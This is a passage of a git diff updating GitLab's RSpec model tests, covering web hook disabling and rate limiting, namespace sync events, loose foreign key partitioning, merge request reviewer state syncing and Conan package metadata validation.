<@' } end + + describe '#ancestors_upto' do + it { expect(group.ancestors_upto.to_sql).not_to include "WITH ORDINALITY" } + end end context 'linear' do @@ -566,6 +542,10 @@ RSpec.describe Group do end end + describe '#ancestors_upto' do + it { expect(group.ancestors_upto.to_sql).to include "WITH ORDINALITY" } + end + context 'when project namespace exists in the group' do let!(:project) { create(:project, group: group) } let!(:project_namespace) { project.project_namespace } @@ -734,7 +714,6 @@ RSpec.describe Group do let!(:project) { create(:project, group: group) } before do - stub_experiments(invite_members_for_task: true) group.add_users([create(:user)], :developer, tasks_to_be_done: %w(ci code), tasks_project_id: project.id) end @@ -2317,14 +2296,6 @@ RSpec.describe Group do end it_behaves_like 'returns the expected groups for a group and its descendants' - - context 'when :linear_group_including_descendants_by feature flag is disabled' do - before do - stub_feature_flags(linear_group_including_descendants_by: false) - end - - it_behaves_like 'returns the expected groups for a group and its descendants' - end end describe '.preset_root_ancestor_for' do diff --git a/spec/models/hooks/web_hook_spec.rb b/spec/models/hooks/web_hook_spec.rb index 59f4533a6c1..c292e78b32d 100644 --- a/spec/models/hooks/web_hook_spec.rb +++ b/spec/models/hooks/web_hook_spec.rb @@ -330,6 +330,20 @@ RSpec.describe WebHook do expect { hook.backoff! }.to change(hook, :backoff_count).by(1) end + context 'when the hook is permanently disabled' do + before do + allow(hook).to receive(:permanently_disabled?).and_return(true) + end + + it 'does not set disabled_until' do + expect { hook.backoff! }.not_to change(hook, :disabled_until) + end + + it 'does not increment the backoff count' do + expect { hook.backoff! 
}.not_to change(hook, :backoff_count) + end + end + context 'when we have backed off MAX_FAILURES times' do before do stub_const("#{described_class}::MAX_FAILURES", 5) @@ -392,4 +406,77 @@ RSpec.describe WebHook do end end end + + describe '#temporarily_disabled?' do + it 'is false when not temporarily disabled' do + expect(hook).not_to be_temporarily_disabled + end + + context 'when hook has been told to back off' do + before do + hook.backoff! + end + + it 'is true' do + expect(hook).to be_temporarily_disabled + end + + it 'is false when `web_hooks_disable_failed` flag is disabled' do + stub_feature_flags(web_hooks_disable_failed: false) + + expect(hook).not_to be_temporarily_disabled + end + end + end + + describe '#permanently_disabled?' do + it 'is false when not disabled' do + expect(hook).not_to be_permanently_disabled + end + + context 'when hook has been disabled' do + before do + hook.disable! + end + + it 'is true' do + expect(hook).to be_permanently_disabled + end + + it 'is false when `web_hooks_disable_failed` flag is disabled' do + stub_feature_flags(web_hooks_disable_failed: false) + + expect(hook).not_to be_permanently_disabled + end + end + end + + describe '#rate_limited?' 
do + context 'when there are rate limits' do + before do + allow(hook).to receive(:rate_limit).and_return(3) + end + + it 'is false when hook has not been rate limited' do + expect(Gitlab::ApplicationRateLimiter).to receive(:peek).and_return(false) + expect(hook).not_to be_rate_limited + end + + it 'is true when hook has been rate limited' do + expect(Gitlab::ApplicationRateLimiter).to receive(:peek).and_return(true) + expect(hook).to be_rate_limited + end + end + + context 'when there are no rate limits' do + before do + allow(hook).to receive(:rate_limit).and_return(nil) + end + + it 'does not call Gitlab::ApplicationRateLimiter, and is false' do + expect(Gitlab::ApplicationRateLimiter).not_to receive(:peek) + expect(hook).not_to be_rate_limited + end + end + end end diff --git a/spec/models/incident_management/issuable_escalation_status_spec.rb b/spec/models/incident_management/issuable_escalation_status_spec.rb index f3e7b90cf3c..c548357bd3f 100644 --- a/spec/models/incident_management/issuable_escalation_status_spec.rb +++ b/spec/models/incident_management/issuable_escalation_status_spec.rb @@ -11,6 +11,7 @@ RSpec.describe IncidentManagement::IssuableEscalationStatus do describe 'associations' do it { is_expected.to belong_to(:issue) } + it { is_expected.to have_one(:project).through(:issue) } end describe 'validatons' do diff --git a/spec/models/instance_configuration_spec.rb b/spec/models/instance_configuration_spec.rb index cc0b69e3526..698d74abf03 100644 --- a/spec/models/instance_configuration_spec.rb +++ b/spec/models/instance_configuration_spec.rb @@ -144,6 +144,7 @@ RSpec.describe InstanceConfiguration do create(:plan_limits, plan: plan1, conan_max_file_size: 1001, + helm_max_file_size: 1008, maven_max_file_size: 1002, npm_max_file_size: 1003, nuget_max_file_size: 1004, @@ -154,6 +155,7 @@ RSpec.describe InstanceConfiguration do create(:plan_limits, plan: plan2, conan_max_file_size: 1101, + helm_max_file_size: 1108, maven_max_file_size: 1102, 
npm_max_file_size: 1103, nuget_max_file_size: 1104, @@ -166,8 +168,8 @@ RSpec.describe InstanceConfiguration do it 'returns package file size limits' do file_size_limits = subject.settings[:package_file_size_limits] - expect(file_size_limits[:Plan1]).to eq({ conan: 1001, maven: 1002, npm: 1003, nuget: 1004, pypi: 1005, terraform_module: 1006, generic: 1007 }) - expect(file_size_limits[:Plan2]).to eq({ conan: 1101, maven: 1102, npm: 1103, nuget: 1104, pypi: 1105, terraform_module: 1106, generic: 1107 }) + expect(file_size_limits[:Plan1]).to eq({ conan: 1001, helm: 1008, maven: 1002, npm: 1003, nuget: 1004, pypi: 1005, terraform_module: 1006, generic: 1007 }) + expect(file_size_limits[:Plan2]).to eq({ conan: 1101, helm: 1108, maven: 1102, npm: 1103, nuget: 1104, pypi: 1105, terraform_module: 1106, generic: 1107 }) end end diff --git a/spec/models/integrations/jira_spec.rb b/spec/models/integrations/jira_spec.rb index 1d81668f97d..9163a7ef845 100644 --- a/spec/models/integrations/jira_spec.rb +++ b/spec/models/integrations/jira_spec.rb @@ -863,7 +863,7 @@ RSpec.describe Integrations::Jira do subject { jira_integration.create_cross_reference_note(jira_issue, resource, user) } shared_examples 'handles cross-references' do - let(:resource_name) { jira_integration.send(:noteable_name, resource) } + let(:resource_name) { jira_integration.send(:mentionable_name, resource) } let(:resource_url) { jira_integration.send(:build_entity_url, resource_name, resource.to_param) } let(:issue_url) { "#{url}/rest/api/2/issue/JIRA-123" } let(:comment_url) { "#{issue_url}/comment" } diff --git a/spec/models/integrations/microsoft_teams_spec.rb b/spec/models/integrations/microsoft_teams_spec.rb index 21b9a005746..06b285a855c 100644 --- a/spec/models/integrations/microsoft_teams_spec.rb +++ b/spec/models/integrations/microsoft_teams_spec.rb @@ -3,6 +3,17 @@ require 'spec_helper' RSpec.describe Integrations::MicrosoftTeams do + it_behaves_like "chat integration", "Microsoft Teams" do + 
let(:client) { ::MicrosoftTeams::Notifier } + let(:client_arguments) { webhook_url } + + let(:payload) do + { + summary: be_present + } + end + end + let(:chat_integration) { described_class.new } let(:webhook_url) { 'https://example.gitlab.com/' } @@ -304,7 +315,7 @@ RSpec.describe Integrations::MicrosoftTeams do context 'with protected branch' do before do - create(:protected_branch, project: project, name: 'a-protected-branch') + create(:protected_branch, :create_branch_on_repository, project: project, name: 'a-protected-branch') end let(:pipeline) do diff --git a/spec/models/integrations/shimo_spec.rb b/spec/models/integrations/shimo_spec.rb index 25df8d2b249..41f3f3c0c16 100644 --- a/spec/models/integrations/shimo_spec.rb +++ b/spec/models/integrations/shimo_spec.rb @@ -38,4 +38,26 @@ RSpec.describe ::Integrations::Shimo do end end end + + describe 'Caching has_shimo on project_settings' do + let(:project) { create(:project) } + + subject { project.project_setting.has_shimo? } + + it 'sets the property to true when integration is active' do + create(:shimo_integration, project: project, active: true) + + is_expected.to be(true) + end + + it 'sets the property to false when integration is not active' do + create(:shimo_integration, project: project, active: false) + + is_expected.to be(false) + end + + it 'creates a project_setting record if one was not already created' do + expect { create(:shimo_integration) }.to change(ProjectSetting, :count).by(1) + end + end end diff --git a/spec/models/issue/email_spec.rb b/spec/models/issue/email_spec.rb new file mode 100644 index 00000000000..57cc7c7df66 --- /dev/null +++ b/spec/models/issue/email_spec.rb @@ -0,0 +1,19 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Issue::Email do + describe 'Associations' do + it { is_expected.to belong_to(:issue) } + end + + describe 'Validations' do + subject { build(:issue_email) } + + it { is_expected.to validate_presence_of(:issue) } + it { 
is_expected.to validate_uniqueness_of(:issue) } + it { is_expected.to validate_uniqueness_of(:email_message_id) } + it { is_expected.to validate_length_of(:email_message_id).is_at_most(1000) } + it { is_expected.to validate_presence_of(:email_message_id) } + end +end diff --git a/spec/models/issue_spec.rb b/spec/models/issue_spec.rb index ba4429451d1..4cbfa7c7758 100644 --- a/spec/models/issue_spec.rb +++ b/spec/models/issue_spec.rb @@ -32,6 +32,7 @@ RSpec.describe Issue do it { is_expected.to have_and_belong_to_many(:self_managed_prometheus_alert_events) } it { is_expected.to have_many(:prometheus_alerts) } it { is_expected.to have_many(:issue_email_participants) } + it { is_expected.to have_one(:email) } it { is_expected.to have_many(:timelogs).autosave(true) } it { is_expected.to have_one(:incident_management_issuable_escalation_status) } it { is_expected.to have_many(:issue_customer_relations_contacts) } @@ -986,6 +987,7 @@ RSpec.describe Issue do issue = build(:issue, project: project) user = build(:user) + allow(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label', project.full_path).and_call_original expect(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label') { false } expect(issue.visible_to_user?(user)).to be_falsy end @@ -1019,6 +1021,7 @@ RSpec.describe Issue do issue = build(:issue, project: project) user = build(:admin) + allow(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label', project.full_path).and_call_original expect(::Gitlab::ExternalAuthorization).to receive(:access_allowed?).with(user, 'a-label') { false } expect(issue.visible_to_user?(user)).to be_falsy end @@ -1314,10 +1317,28 @@ RSpec.describe Issue do let_it_be(:issue1) { create(:issue, project: project, relative_position: nil) } let_it_be(:issue2) { create(:issue, project: project, relative_position: nil) } - it_behaves_like "a class that supports relative positioning" do - let_it_be(:project) { 
reusable_project } - let(:factory) { :issue } - let(:default_params) { { project: project } } + context 'when optimized_issue_neighbor_queries is enabled' do + before do + stub_feature_flags(optimized_issue_neighbor_queries: true) + end + + it_behaves_like "a class that supports relative positioning" do + let_it_be(:project) { reusable_project } + let(:factory) { :issue } + let(:default_params) { { project: project } } + end + end + + context 'when optimized_issue_neighbor_queries is disabled' do + before do + stub_feature_flags(optimized_issue_neighbor_queries: false) + end + + it_behaves_like "a class that supports relative positioning" do + let_it_be(:project) { reusable_project } + let(:factory) { :issue } + let(:default_params) { { project: project } } + end end it 'is not blocked for repositioning by default' do @@ -1461,7 +1482,7 @@ RSpec.describe Issue do it 'schedules rebalancing if there is no space left' do lhs = build_stubbed(:issue, relative_position: 99, project: project) to_move = build(:issue, project: project) - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, project_id, namespace_id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, project_id, namespace_id) expect { to_move.move_between(lhs, issue) }.to raise_error(RelativePositioning::NoSpaceLeft) end diff --git a/spec/models/lfs_objects_project_spec.rb b/spec/models/lfs_objects_project_spec.rb index df49b60c4fa..7378beeed06 100644 --- a/spec/models/lfs_objects_project_spec.rb +++ b/spec/models/lfs_objects_project_spec.rb @@ -25,6 +25,28 @@ RSpec.describe LfsObjectsProject do end end + describe '#link_to_project!' 
do + it 'does not throw error when duplicate exists' do + subject + + expect do + result = described_class.link_to_project!(subject.lfs_object, subject.project) + expect(result).to be_a(LfsObjectsProject) + end.not_to change { described_class.count } + end + + it 'upserts a new entry and updates the project cache' do + new_project = create(:project) + + allow(ProjectCacheWorker).to receive(:perform_async).and_call_original + expect(ProjectCacheWorker).to receive(:perform_async).with(new_project.id, [], [:lfs_objects_size]) + expect { described_class.link_to_project!(subject.lfs_object, new_project) } + .to change { described_class.count } + + expect(described_class.find_by(lfs_object_id: subject.lfs_object.id, project_id: new_project.id)).to be_present + end + end + describe '#update_project_statistics' do it 'updates project statistics when the object is added' do expect(ProjectCacheWorker).to receive(:perform_async) diff --git a/spec/models/loose_foreign_keys/deleted_record_spec.rb b/spec/models/loose_foreign_keys/deleted_record_spec.rb index cd5068bdb52..07ffff746a5 100644 --- a/spec/models/loose_foreign_keys/deleted_record_spec.rb +++ b/spec/models/loose_foreign_keys/deleted_record_spec.rb @@ -5,31 +5,148 @@ require 'spec_helper' RSpec.describe LooseForeignKeys::DeletedRecord, type: :model do let_it_be(:table) { 'public.projects' } - let_it_be(:deleted_record_1) { described_class.create!(partition: 1, fully_qualified_table_name: table, primary_key_value: 5) } - let_it_be(:deleted_record_2) { described_class.create!(partition: 1, fully_qualified_table_name: table, primary_key_value: 1) } - let_it_be(:deleted_record_3) { described_class.create!(partition: 1, fully_qualified_table_name: 'public.other_table', primary_key_value: 3) } - let_it_be(:deleted_record_4) { described_class.create!(partition: 1, fully_qualified_table_name: table, primary_key_value: 1) } # duplicate + describe 'class methods' do + let_it_be(:deleted_record_1) { 
described_class.create!(fully_qualified_table_name: table, primary_key_value: 5) } + let_it_be(:deleted_record_2) { described_class.create!(fully_qualified_table_name: table, primary_key_value: 1) } + let_it_be(:deleted_record_3) { described_class.create!(fully_qualified_table_name: 'public.other_table', primary_key_value: 3) } + let_it_be(:deleted_record_4) { described_class.create!(fully_qualified_table_name: table, primary_key_value: 1) } # duplicate - describe '.load_batch_for_table' do - it 'loads records and orders them by creation date' do - records = described_class.load_batch_for_table(table, 10) + describe '.load_batch_for_table' do + it 'loads records and orders them by creation date' do + records = described_class.load_batch_for_table(table, 10) - expect(records).to eq([deleted_record_1, deleted_record_2, deleted_record_4]) + expect(records).to eq([deleted_record_1, deleted_record_2, deleted_record_4]) + end + + it 'supports configurable batch size' do + records = described_class.load_batch_for_table(table, 2) + + expect(records).to eq([deleted_record_1, deleted_record_2]) + end end - it 'supports configurable batch size' do - records = described_class.load_batch_for_table(table, 2) + describe '.mark_records_processed' do + it 'updates all records' do + records = described_class.load_batch_for_table(table, 10) + described_class.mark_records_processed(records) - expect(records).to eq([deleted_record_1, deleted_record_2]) + expect(described_class.status_pending.count).to eq(1) + expect(described_class.status_processed.count).to eq(3) + end end end - describe '.mark_records_processed' do - it 'updates all records' do - described_class.mark_records_processed([deleted_record_1, deleted_record_2, deleted_record_4]) + describe 'sliding_list partitioning' do + let(:connection) { described_class.connection } + let(:partition_manager) { Gitlab::Database::Partitioning::PartitionManager.new(described_class) } + + describe 'next_partition_if callback' do + 
let(:active_partition) { described_class.partitioning_strategy.active_partition.value } + + subject(:value) { described_class.partitioning_strategy.next_partition_if.call(active_partition) } + + context 'when the partition is empty' do + it { is_expected.to eq(false) } + end + + context 'when the partition has records' do + before do + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 1, status: :processed) + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 2, status: :pending) + end + + it { is_expected.to eq(false) } + end + + context 'when the first record of the partition is older than PARTITION_DURATION' do + before do + described_class.create!( + fully_qualified_table_name: 'public.table', + primary_key_value: 1, + created_at: (described_class::PARTITION_DURATION + 1.day).ago) + + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 2) + end + + it { is_expected.to eq(true) } + + context 'when the lfk_automatic_partition_creation FF is off' do + before do + stub_feature_flags(lfk_automatic_partition_creation: false) + end + + it { is_expected.to eq(false) } + end + end + end + + describe 'detach_partition_if callback' do + let(:active_partition) { described_class.partitioning_strategy.active_partition.value } + + subject(:value) { described_class.partitioning_strategy.detach_partition_if.call(active_partition) } + + context 'when the partition contains unprocessed records' do + before do + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 1, status: :processed) + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 2, status: :pending) + end + + it { is_expected.to eq(false) } + end + + context 'when the partition contains only processed records' do + before do + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 1, status: :processed) + 
described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 2, status: :processed) + end + + it { is_expected.to eq(true) } + + context 'when the lfk_automatic_partition_dropping FF is off' do + before do + stub_feature_flags(lfk_automatic_partition_dropping: false) + end + + it { is_expected.to eq(false) } + end + end + end + + describe 'the behavior of the strategy' do + it 'moves records to new partitions as time passes', :freeze_time do + # We start with partition 1 + expect(described_class.partitioning_strategy.current_partitions.map(&:value)).to eq([1]) + + # it's not a day old yet so no new partitions are created + partition_manager.sync_partitions + + expect(described_class.partitioning_strategy.current_partitions.map(&:value)).to eq([1]) + + # add one record so the next partition will be created + described_class.create!(fully_qualified_table_name: 'public.table', primary_key_value: 1) + + # after traveling forward a day + travel(described_class::PARTITION_DURATION + 1.second) + + # a new partition is created + partition_manager.sync_partitions + + expect(described_class.partitioning_strategy.current_partitions.map(&:value)).to eq([1, 2]) + + # and we can insert to the new partition + expect { described_class.create!(fully_qualified_table_name: table, primary_key_value: 5) }.not_to raise_error + + # after processing old records + LooseForeignKeys::DeletedRecord.for_partition(1).update_all(status: :processed) + + partition_manager.sync_partitions + + # the old one is removed + expect(described_class.partitioning_strategy.current_partitions.map(&:value)).to eq([2]) - expect(described_class.status_pending.count).to eq(1) - expect(described_class.status_processed.count).to eq(3) + # and we only have the newly created partition left. 
+ expect(described_class.count).to eq(1) + end end end end diff --git a/spec/models/member_spec.rb b/spec/models/member_spec.rb index abff1815f1a..7ce32de6edc 100644 --- a/spec/models/member_spec.rb +++ b/spec/models/member_spec.rb @@ -681,8 +681,6 @@ RSpec.describe Member do end it 'schedules a TasksToBeDone::CreateWorker task' do - stub_experiments(invite_members_for_task: true) - member_task = create(:member_task, member: member, project: member.project) expect(TasksToBeDone::CreateWorker) diff --git a/spec/models/merge_request/metrics_spec.rb b/spec/models/merge_request/metrics_spec.rb index 13ff239a306..a4bdac39074 100644 --- a/spec/models/merge_request/metrics_spec.rb +++ b/spec/models/merge_request/metrics_spec.rb @@ -48,4 +48,10 @@ RSpec.describe MergeRequest::Metrics do end end end + + it_behaves_like 'cleanup by a loose foreign key' do + let!(:merge_request) { create(:merge_request) } + let!(:parent) { create(:ci_pipeline, project: merge_request.target_project) } + let!(:model) { merge_request.metrics.tap { |metrics| metrics.update!(pipeline: parent) } } + end end diff --git a/spec/models/merge_request_assignee_spec.rb b/spec/models/merge_request_assignee_spec.rb index 5bb8e7184a3..58b802de8e0 100644 --- a/spec/models/merge_request_assignee_spec.rb +++ b/spec/models/merge_request_assignee_spec.rb @@ -3,9 +3,10 @@ require 'spec_helper' RSpec.describe MergeRequestAssignee do + let(:assignee) { create(:user) } let(:merge_request) { create(:merge_request) } - subject { merge_request.merge_request_assignees.build(assignee: create(:user)) } + subject { merge_request.merge_request_assignees.build(assignee: assignee) } describe 'associations' do it { is_expected.to belong_to(:merge_request).class_name('MergeRequest') } @@ -41,4 +42,13 @@ RSpec.describe MergeRequestAssignee do it_behaves_like 'having unique enum values' it_behaves_like 'having reviewer state' + + describe 'syncs to reviewer state' do + before do + reviewer = 
merge_request.merge_request_reviewers.build(reviewer: assignee) + reviewer.update!(state: :reviewed) + end + + it { is_expected.to have_attributes(state: 'reviewed') } + end end diff --git a/spec/models/merge_request_reviewer_spec.rb b/spec/models/merge_request_reviewer_spec.rb index d69d60c94f0..d99fd4afb0f 100644 --- a/spec/models/merge_request_reviewer_spec.rb +++ b/spec/models/merge_request_reviewer_spec.rb @@ -3,14 +3,24 @@ require 'spec_helper' RSpec.describe MergeRequestReviewer do + let(:reviewer) { create(:user) } let(:merge_request) { create(:merge_request) } - subject { merge_request.merge_request_reviewers.build(reviewer: create(:user)) } + subject { merge_request.merge_request_reviewers.build(reviewer: reviewer) } it_behaves_like 'having unique enum values' it_behaves_like 'having reviewer state' + describe 'syncs to assignee state' do + before do + assignee = merge_request.merge_request_assignees.build(assignee: reviewer) + assignee.update!(state: :reviewed) + end + + it { is_expected.to have_attributes(state: 'reviewed') } + end + describe 'associations' do it { is_expected.to belong_to(:merge_request).class_name('MergeRequest') } it { is_expected.to belong_to(:reviewer).class_name('User').inverse_of(:merge_request_reviewers) } diff --git a/spec/models/merge_request_spec.rb b/spec/models/merge_request_spec.rb index 5618fb06157..e1db1b3cf3e 100644 --- a/spec/models/merge_request_spec.rb +++ b/spec/models/merge_request_spec.rb @@ -178,6 +178,13 @@ RSpec.describe MergeRequest, factory_default: :keep do it 'returns the merge request title' do expect(subject.default_squash_commit_message).to eq(subject.title) end + + it 'uses template from target project' do + subject.target_project.squash_commit_template = 'Squashed branch %{source_branch} into %{target_branch}' + + expect(subject.default_squash_commit_message) + .to eq('Squashed branch master into feature') + end end describe 'modules' do @@ -1132,7 +1139,7 @@ RSpec.describe MergeRequest, 
factory_default: :keep do end it 'returns the correct overflow count' do - allow(Commit).to receive(:max_diff_options).and_return(max_files: 2) + allow(Commit).to receive(:diff_max_files).and_return(2) set_compare(merge_request) expect(merge_request.diff_size).to eq('2+') @@ -1641,6 +1648,9 @@ RSpec.describe MergeRequest, factory_default: :keep do it 'uses template from target project' do request = build(:merge_request, title: 'Fix everything') + request.compare_commits = [ + double(safe_message: 'Commit message', gitaly_commit?: true, merge_commit?: false, description?: false) + ] subject.target_project.merge_commit_template = '%{title}' expect(request.default_merge_commit_message) @@ -3953,7 +3963,7 @@ RSpec.describe MergeRequest, factory_default: :keep do create_build(source_pipeline, 60.2, 'test:1') create_build(target_pipeline, 50, 'test:2') - expect(merge_request.pipeline_coverage_delta).to eq('10.20') + expect(merge_request.pipeline_coverage_delta).to be_within(0.001).of(10.2) end end @@ -5032,4 +5042,8 @@ RSpec.describe MergeRequest, factory_default: :keep do expect(described_class.from_fork).to eq([fork_mr]) end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :merge_request } + end end diff --git a/spec/models/namespace/traversal_hierarchy_spec.rb b/spec/models/namespace/traversal_hierarchy_spec.rb index d7b0ee888c0..51932ab943c 100644 --- a/spec/models/namespace/traversal_hierarchy_spec.rb +++ b/spec/models/namespace/traversal_hierarchy_spec.rb @@ -21,7 +21,7 @@ RSpec.describe Namespace::TraversalHierarchy, type: :model do end context 'with group outside of hierarchy' do - let(:group) { create(:namespace) } + let(:group) { create(:group) } it { expect(hierarchy.root).not_to eq root } end diff --git a/spec/models/namespace_spec.rb b/spec/models/namespace_spec.rb index 8f5860c799c..54327fc70d9 100644 --- a/spec/models/namespace_spec.rb +++ b/spec/models/namespace_spec.rb @@ -107,34 +107,6 @@ RSpec.describe Namespace do end end 
end - - context 'when the feature flag `validate_namespace_parent_type` is disabled' do - before do - stub_feature_flags(validate_namespace_parent_type: false) - end - - context 'when the namespace has no parent' do - it 'allows a namespace to have no parent associated with it' do - namespace = build(:namespace) - - expect(namespace).to be_valid - end - end - - context 'when the namespace has a parent' do - it 'allows a namespace to have a group as its parent' do - namespace = build(:namespace, parent: build(:group)) - - expect(namespace).to be_valid - end - - it 'allows a namespace to have another namespace as its parent' do - namespace = build(:namespace, parent: build(:namespace)) - - expect(namespace).to be_valid - end - end - end end describe '#nesting_level_allowed' do @@ -287,13 +259,12 @@ RSpec.describe Namespace do end end - context 'creating a Namespace with nil type' do + context 'unable to create a Namespace with nil type' do + let(:namespace) { nil } let(:namespace_type) { nil } - it 'is the correct type of namespace' do - expect(Namespace.find(namespace.id)).to be_a(Namespace) - expect(namespace.kind).to eq('user') - expect(namespace.user_namespace?).to be_truthy + it 'raises ActiveRecord::NotNullViolation' do + expect { create(:namespace, type: namespace_type, parent: parent) }.to raise_error(ActiveRecord::NotNullViolation) end end @@ -700,20 +671,6 @@ RSpec.describe Namespace do end end - describe '#ancestors_upto' do - let(:parent) { create(:group) } - let(:child) { create(:group, parent: parent) } - let(:child2) { create(:group, parent: child) } - - it 'returns all ancestors when no namespace is given' do - expect(child2.ancestors_upto).to contain_exactly(child, parent) - end - - it 'includes ancestors upto but excluding the given ancestor' do - expect(child2.ancestors_upto(parent)).to contain_exactly(child) - end - end - describe '#move_dir', :request_store do shared_examples "namespace restrictions" do context "when any project has container 
images" do @@ -1274,6 +1231,38 @@ RSpec.describe Namespace do end end + describe '#use_traversal_ids_for_ancestors_upto?' do + let_it_be(:namespace, reload: true) { create(:namespace) } + + subject { namespace.use_traversal_ids_for_ancestors_upto? } + + context 'when use_traversal_ids_for_ancestors_upto feature flag is true' do + before do + stub_feature_flags(use_traversal_ids_for_ancestors_upto: true) + end + + it { is_expected.to eq true } + + it_behaves_like 'disabled feature flag when traversal_ids is blank' + end + + context 'when use_traversal_ids_for_ancestors_upto feature flag is false' do + before do + stub_feature_flags(use_traversal_ids_for_ancestors_upto: false) + end + + it { is_expected.to eq false } + end + + context 'when use_traversal_ids? feature flag is false' do + before do + stub_feature_flags(use_traversal_ids: false) + end + + it { is_expected.to eq false } + end + end + describe '#users_with_descendants' do let(:user_a) { create(:user) } let(:user_b) { create(:user) } @@ -2066,4 +2055,79 @@ RSpec.describe Namespace do it { is_expected.to be(true) } end end + + it_behaves_like 'it has loose foreign keys' do + let(:factory_name) { :group } + end + + context 'Namespaces::SyncEvent' do + let!(:namespace) { create(:group) } + + let_it_be(:new_namespace1) { create(:group) } + let_it_be(:new_namespace2) { create(:group) } + + context 'when creating the namespace' do + it 'creates a namespaces_sync_event record' do + expect(namespace.sync_events.count).to eq(1) + end + + it 'enqueues ProcessSyncEventsWorker' do + expect(Namespaces::ProcessSyncEventsWorker).to receive(:perform_async) + + create(:namespace) + end + end + + context 'when updating namespace parent_id' do + it 'creates a namespaces_sync_event record' do + expect do + namespace.update!(parent_id: new_namespace1.id) + end.to change(Namespaces::SyncEvent, :count).by(1) + + expect(namespace.sync_events.count).to eq(2) + end + + it 'enqueues ProcessSyncEventsWorker' do + 
expect(Namespaces::ProcessSyncEventsWorker).to receive(:perform_async) + + namespace.update!(parent_id: new_namespace1.id) + end + end + + context 'when updating namespace other attribute' do + it 'creates a namespaces_sync_event record' do + expect do + namespace.update!(name: 'hello') + end.not_to change(Namespaces::SyncEvent, :count) + end + end + + context 'in the same transaction' do + context 'when updating different parent_id' do + it 'creates two namespaces_sync_event records' do + expect do + Namespace.transaction do + namespace.update!(parent_id: new_namespace1.id) + namespace.update!(parent_id: new_namespace2.id) + end + end.to change(Namespaces::SyncEvent, :count).by(2) + + expect(namespace.sync_events.count).to eq(3) + end + end + + context 'when updating the same parent_id' do + it 'creates one namespaces_sync_event record' do + expect do + Namespace.transaction do + namespace.update!(parent_id: new_namespace1.id) + namespace.update!(parent_id: new_namespace1.id) + end + end.to change(Namespaces::SyncEvent, :count).by(1) + + expect(namespace.sync_events.count).to eq(2) + end + end + end + end end diff --git a/spec/models/packages/build_info_spec.rb b/spec/models/packages/build_info_spec.rb index a4369c56fe2..db8ac605d72 100644 --- a/spec/models/packages/build_info_spec.rb +++ b/spec/models/packages/build_info_spec.rb @@ -6,4 +6,46 @@ RSpec.describe Packages::BuildInfo, type: :model do it { is_expected.to belong_to(:package) } it { is_expected.to belong_to(:pipeline) } end + + context 'with some build infos' do + let_it_be(:package) { create(:package) } + let_it_be(:build_infos) { create_list(:package_build_info, 3, :with_pipeline, package: package) } + let_it_be(:build_info_with_no_pipeline) { create(:package_build_info) } + + describe '.pluck_pipeline_ids' do + subject { package.build_infos.pluck_pipeline_ids.sort } + + it { is_expected.to eq(build_infos.map(&:pipeline_id).sort) } + end + + describe '.without_empty_pipelines' do + subject { 
package.build_infos.without_empty_pipelines } + + it { is_expected.to contain_exactly(*build_infos) } + end + + describe '.order_by_pipeline_id asc' do + subject { package.build_infos.order_by_pipeline_id(:asc) } + + it { is_expected.to eq(build_infos) } + end + + describe '.order_by_pipeline_id desc' do + subject { package.build_infos.order_by_pipeline_id(:desc) } + + it { is_expected.to eq(build_infos.reverse) } + end + + describe '.with_pipeline_id_less_than' do + subject { package.build_infos.with_pipeline_id_less_than(build_infos[1].pipeline_id) } + + it { is_expected.to contain_exactly(build_infos[0]) } + end + + describe '.with_pipeline_id_greater_than' do + subject { package.build_infos.with_pipeline_id_greater_than(build_infos[1].pipeline_id) } + + it { is_expected.to contain_exactly(build_infos[2]) } + end + end end diff --git a/spec/models/packages/conan/metadatum_spec.rb b/spec/models/packages/conan/metadatum_spec.rb index 112f395818b..d00723e8e43 100644 --- a/spec/models/packages/conan/metadatum_spec.rb +++ b/spec/models/packages/conan/metadatum_spec.rb @@ -3,6 +3,8 @@ require 'spec_helper' RSpec.describe Packages::Conan::Metadatum, type: :model do + using RSpec::Parameterized::TableSyntax + describe 'relationships' do it { is_expected.to belong_to(:package) } end @@ -45,6 +47,30 @@ RSpec.describe Packages::Conan::Metadatum, type: :model do it { is_expected.not_to allow_value("my@channel").for(:package_channel) } end + describe '#username_channel_none_values' do + let_it_be(:package) { create(:conan_package) } + + let(:metadatum) { package.conan_metadatum } + + subject { metadatum.valid? 
} + + where(:username, :channel, :valid) do + 'username' | 'channel' | true + 'username' | '_' | false + '_' | 'channel' | false + '_' | '_' | true + end + + with_them do + before do + metadatum.package_username = username + metadatum.package_channel = channel + end + + it { is_expected.to eq(valid) } + end + end + describe '#conan_package_type' do it 'will not allow a package with a different package_type' do package = build('package') @@ -87,4 +113,27 @@ RSpec.describe Packages::Conan::Metadatum, type: :model do expect(described_class.full_path_from(package_username: username)).to eq('foo/bar/baz-buz') end end + + describe '.validate_username_and_channel' do + where(:username, :channel, :error_field) do + 'username' | 'channel' | nil + 'username' | '_' | :channel + '_' | 'channel' | :username + '_' | '_' | nil + end + + with_them do + if params[:error_field] + it 'yields the block when there is an error' do + described_class.validate_username_and_channel(username, channel) do |none_field| + expect(none_field).to eq(error_field) + end + end + else + it 'does not yield the block when there is no error' do + expect { |b| described_class.validate_username_and_channel(username, channel, &b) }.not_to yield_control + end + end + end + end end diff --git a/spec/models/postgresql/replication_slot_spec.rb b/spec/models/postgresql/replication_slot_spec.rb index c3b67a2e7b8..63a19541ab5 100644 --- a/spec/models/postgresql/replication_slot_spec.rb +++ b/spec/models/postgresql/replication_slot_spec.rb @@ -3,6 +3,8 @@ require 'spec_helper' RSpec.describe Postgresql::ReplicationSlot do + it { is_expected.to be_a Gitlab::Database::SharedModel } + describe '.in_use?' 
